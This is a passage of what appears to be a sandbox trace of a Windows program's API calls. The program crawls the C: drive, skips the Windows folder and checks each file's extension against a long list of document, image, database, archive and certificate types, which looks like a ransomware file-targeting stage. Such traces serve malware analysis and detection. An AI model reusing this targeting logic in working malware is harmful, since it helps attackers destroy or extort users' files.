ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0244.687] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".3ds", lpString2=".WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".3fr", lpString2=".WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".3g2", lpString2=".WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".3gp", lpString2=".WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".accda", lpString2="25.WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".accdb", lpString2="25.WMF") returned -1 [0244.687] lstrcmpiW (lpString1=".accdc", lpString2="25.WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".accde", lpString2="25.WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".accdt", lpString2="25.WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".accdw", lpString2="25.WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".adb", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".adp", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai", lpString2="WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai3", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai4", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai5", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai6", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai7", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ai8", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".anim", lpString2="5.WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".arw", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".as", lpString2="WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".asa", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".asc", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".ascx", lpString2="5.WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".asm", lpString2=".WMF") returned -1 [0244.688] lstrcmpiW (lpString1=".asmx", lpString2="5.WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".asp", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".aspx", lpString2="5.WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".asr", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".asx", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".avi", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".avs", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".backup", lpString2="825.WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".bak", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".bay", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".bd", lpString2="WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".bmp", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".c", lpString2="MF") returned -1 [0244.689] lstrcmpiW (lpString1=".cdr", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".cer", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".cf", lpString2="WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".cfc", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".cfm", lpString2=".WMF") returned -1 [0244.689] lstrcmpiW (lpString1=".cfml", lpString2="5.WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".cfu", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".chm", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".cin", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".class", lpString2="25.WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".clx", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".config", lpString2="825.WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".cpp", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".cr2", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".crt", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".crw", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".cs", lpString2="WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".css", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".csv", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".cub", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".dae", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".dat", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".db", lpString2="WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".dbx", lpString2=".WMF") returned -1 [0244.690] lstrcmpiW (lpString1=".dc3", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dcm", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dcr", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".der", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dib", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dic", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dif", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".divx", lpString2="5.WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".djvu", lpString2="5.WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dng", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".docm", lpString2="5.WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dot", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dotm", lpString2="5.WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dotx", lpString2="5.WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dpx", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dqy", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dsn", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dt", lpString2="WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dtd", lpString2=".WMF") returned -1 [0244.691] lstrcmpiW (lpString1=".dwg", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".dwt", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".dx", lpString2="WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".dxf", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".edml", lpString2="5.WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".efd", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".elf", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".emf", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".emz", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".epf", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".eps", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".epsf", lpString2="5.WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".epsp", lpString2="5.WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".erf", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".exr", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".f4v", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".fido", lpString2="5.WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".flm", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".flv", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0244.692] lstrcmpiW (lpString1=".fxg", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".geo", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".gif", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".grs", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".gz", lpString2="WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".h", lpString2="MF") returned -1 [0244.693] lstrcmpiW (lpString1=".hdr", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".hpp", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".htc", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".htm", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".html", lpString2="5.WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".icb", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".iff", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".inc", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".indd", lpString2="5.WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".iqy", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".j2c", lpString2=".WMF") returned -1 [0244.693] lstrcmpiW (lpString1=".j2k", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".java", lpString2="5.WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jp2", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jpc", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jpe", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jpeg", lpString2="5.WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jpf", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jpx", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".js", lpString2="WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jsf", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".json", lpString2="5.WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".jsp", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".kdc", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".kmz", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".kwm", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".lasso", lpString2="25.WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".lbi", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".lgf", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".lgp", lpString2=".WMF") returned -1 [0244.694] lstrcmpiW (lpString1=".log", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".m1v", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".m4a", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".m4v", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".max", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".md", lpString2="WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mda", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mdb", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mde", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mdw", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mef", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mft", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mfw", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mht", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mhtml", lpString2="25.WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mka", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mkidx", lpString2="25.WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mkv", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mos", lpString2=".WMF") returned -1 [0244.695] lstrcmpiW (lpString1=".mov", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mp4", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mpeg", lpString2="5.WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mpg", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mpv", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mrw", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".msg", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".mxl", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".myi", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".nef", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".nrw", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".obj", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".odb", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".odc", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".odm", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".odp", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".ods", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".oft", lpString2=".WMF") returned -1 [0244.696] lstrcmpiW (lpString1=".one", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".onepkg", lpString2="825.WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".onetoc2", lpString2="7825.WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".opt", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".oqy", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".orf", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".p12", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".p7b", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".p7c", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pam", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pbm", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pct", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pcx", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pdd", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pdp", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pef", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pem", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pff", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pfm", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pfx", lpString2=".WMF") returned -1 [0244.697] lstrcmpiW (lpString1=".pgm", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".php", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".php3", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".php4", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".php5", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".phtml", lpString2="25.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pict", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pl", lpString2="WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pls", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pm", lpString2="WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".png", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pnm", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pot", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".potm", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".potx", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".ppa", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".ppam", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".ppm", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".pps", lpString2=".WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".ppsm", lpString2="5.WMF") returned -1 [0244.698] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".pptm", lpString2="5.WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".pptx", lpString2="5.WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".prn", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".ps", lpString2="WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".psb", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".psd", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".pst", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".ptx", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".pub", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".pwm", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".pxr", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".py", lpString2="WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".qt", lpString2="WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".r3d", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".raf", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".raw", lpString2=".WMF") returned -1 [0244.699] lstrcmpiW (lpString1=".rdf", lpString2=".WMF") returned -1 [0251.365] FindNextFileW (in: hFindFile=0x3de4af0, lpFindFileData=0x3baee18 | out: lpFindFileData=0x3baee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22fbc446, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0251.365] FindNextFileW (in: hFindFile=0x3de4af0, lpFindFileData=0x3baee18 | out: lpFindFileData=0x3baee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1172, dwReserved0=0x0, dwReserved1=0x0, cFileName="picturePuzzle.css", cAlternateFileName="")) returned 1 Thread: id = 64 os_tid = 0x650 [0241.421] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0x4700060 [0241.421] lstrlenW (lpString="C:") returned 2 [0241.421] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3cefd00 | out: lpFindFileData=0x3cefd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xbc4328 [0241.421] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0241.421] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0241.421] lstrlenW (lpString="$Recycle.Bin") returned 12 [0241.421] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0241.421] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0x4710068 [0241.421] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0241.422] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3cefa84 | out: lpFindFileData=0x3cefa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbc4368 [0241.422] FindNextFileW (in: hFindFile=0xbc4368, lpFindFileData=0x3cefa84 | out: lpFindFileData=0x3cefa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.422] FindNextFileW (in: hFindFile=0xbc4368, lpFindFileData=0x3cefa84 | out: lpFindFileData=0x3cefa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0241.422] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0241.422] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0241.422] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0241.422] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0241.422] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0x4720070 [0241.422] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0241.422] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3cef808 | out: lpFindFileData=0x3cef808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbc53b0 [0241.422] FindNextFileW (in: hFindFile=0xbc53b0, lpFindFileData=0x3cef808 | out: lpFindFileData=0x3cef808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.422] FindNextFileW (in: hFindFile=0xbc53b0, lpFindFileData=0x3cef808 | out: lpFindFileData=0x3cef808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xba94a0a0, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0241.422] lstrlenW (lpString="desktop.ini") returned 11 [0241.422] lstrlenW (lpString=".1cd") returned 4 [0241.422] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0241.422] lstrlenW (lpString=".3ds") returned 4 [0241.422] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0241.422] lstrlenW (lpString=".3fr") returned 4 [0241.423] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".3g2") returned 4 [0241.423] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".3gp") returned 4 [0241.423] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".7z") returned 3 [0241.423] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0241.423] lstrlenW (lpString=".accda") returned 6 [0241.423] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0241.423] lstrlenW (lpString=".accdb") returned 6 [0241.423] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0241.423] lstrlenW (lpString=".accdc") returned 6 [0241.423] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0241.423] lstrlenW (lpString=".accde") returned 6 [0241.423] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0241.423] lstrlenW (lpString=".accdt") returned 6 [0241.423] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0241.423] lstrlenW (lpString=".accdw") returned 6 [0241.423] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0241.423] lstrlenW (lpString=".adb") returned 4 [0241.423] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".adp") returned 4 [0241.423] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".ai") returned 3 [0241.423] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0241.423] lstrlenW (lpString=".ai3") returned 4 [0241.423] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".ai4") returned 4 [0241.423] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0241.423] lstrlenW (lpString=".ai5") returned 4 [0241.423] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".ai6") returned 4 [0241.424] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".ai7") returned 4 [0241.424] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".ai8") returned 4 [0241.424] lstrcmpiW 